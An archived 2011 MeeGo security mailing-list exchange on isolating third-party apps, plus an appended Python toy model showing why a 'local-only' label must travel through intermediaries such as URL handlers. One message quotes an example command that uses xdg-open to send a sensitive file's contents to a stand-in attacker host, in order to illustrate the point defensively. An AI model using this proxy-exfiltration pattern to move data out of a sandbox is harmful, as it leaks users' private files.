[Meego-security-discussion] Arbitrary 3rd Party Code

Michael Leibowitz michael.leibowitz at intel.com
Thu Apr 7 17:18:45 PDT 2011


On 04/07/2011 04:32 PM, Praveen Gupta wrote:
> URL is not usable.. Please re-send..
That wasn't a valid URL; it was an example of gaining network access by 
proxy.

My point was that disabling network access seems simple but is harder 
than it seems.  Not only must one shut off the ability to directly make 
network connections, but one must make sure that it is not possible to 
use other means to use the network through an intermediary that may not 
be able to distinguish that the network is being accessed.  In other 
words, unless you carry the "label" concept end-to-end, you're just 
fooling yourself.

Cheers
> Again, separation of local-access only data is, just, one use case..
>
> There are several other use cases.. For example -
>
> * Separation of "enterprise", "Carrier" and "application-sensitive" data
> * Restriction of data cross-over from one domain to another
>
> Mobile platforms have "unique" security requirements.
>
> Implementation of these requirements is *necessary* for adoption of mobile
> platforms by "sensitive" enterprise applications (for example).. Several
> other such scenarios / use-cases exist.
>
> We need *requirements* which we can map to different Meego releases..
>
> After requirements are frozen, we need to propose "architecture" with
> release plan.
>
> Thx, -Praveen
>
> -----Original Message-----
> From: Michael Leibowitz [mailto:michael.leibowitz at intel.com]
> Sent: Thursday, April 07, 2011 4:06 PM
> To: pgupta at mobilestack.com
> Cc: Andy Ross; meego-security-discussion at lists.meego.com
> Subject: Re: [Meego-security-discussion] Arbitrary 3rd Party Code
>
> On 04/07/2011 03:53 PM, pgupta at mobilestack.com wrote:
>> Correct.
>>
>> By identifying data as local access data only, we should "disable" network
>> access for such application and solve this problem
>
> xdg-open http://l33th4x0rs.com/pwnme?file=$sensitive_file&data=.....
>
> Cheers
>
>
>
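
The point in the message above about carrying the label end-to-end, as a small model added here (not part of the original message or of MeeGo). `Caller`, `Platform`, `open_url` and the `local-only` label are hypothetical names, the URL is constructed, and no real network traffic is generated.

```python
"""Toy model (constructed): a "no network" label only helps if it travels
with the request to every intermediary that can reach the network."""
from dataclasses import dataclass

@dataclass(frozen=True)
class Caller:
    name: str
    labels: frozenset  # e.g. {"local-only"}

class Platform:
    """Hypothetical platform: one direct path, one intermediary (a URL opener)."""
    def __init__(self, carry_labels):
        self.carry_labels = carry_labels
        self.sent = []  # (sender, url) records; no real network I/O

    def connect(self, caller, url):
        # Direct path: denied for local-only callers under both policies.
        if "local-only" in caller.labels:
            raise PermissionError(f"{caller.name}: network access denied")
        self.sent.append((caller.name, url))

    def open_url(self, caller, url):
        # Intermediary path. Without label propagation the handler acts
        # under its own identity and cannot tell that a local-only app
        # originated the request; with it, the label follows the request.
        labels = caller.labels if self.carry_labels else frozenset()
        self.connect(Caller("url-handler", labels), url)

def try_paths(carry_labels):
    """Return, per path, whether a local-only app can cause network traffic."""
    app = Caller("notes-app", frozenset({"local-only"}))
    url = "http://collector.example/?data=PLACEHOLDER"  # constructed value
    results = {}
    for path in ("connect", "open_url"):
        platform = Platform(carry_labels)
        try:
            getattr(platform, path)(app, url)
            results[path] = "allowed"
        except PermissionError:
            results[path] = "denied"
    return results

if __name__ == "__main__":
    print("direct check only:", try_paths(carry_labels=False))
    print("labels end-to-end:", try_paths(carry_labels=True))
```

With the direct check alone, the `open_url` path still reaches the network on the app's behalf; only when the label is propagated to the handler are both paths denied.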


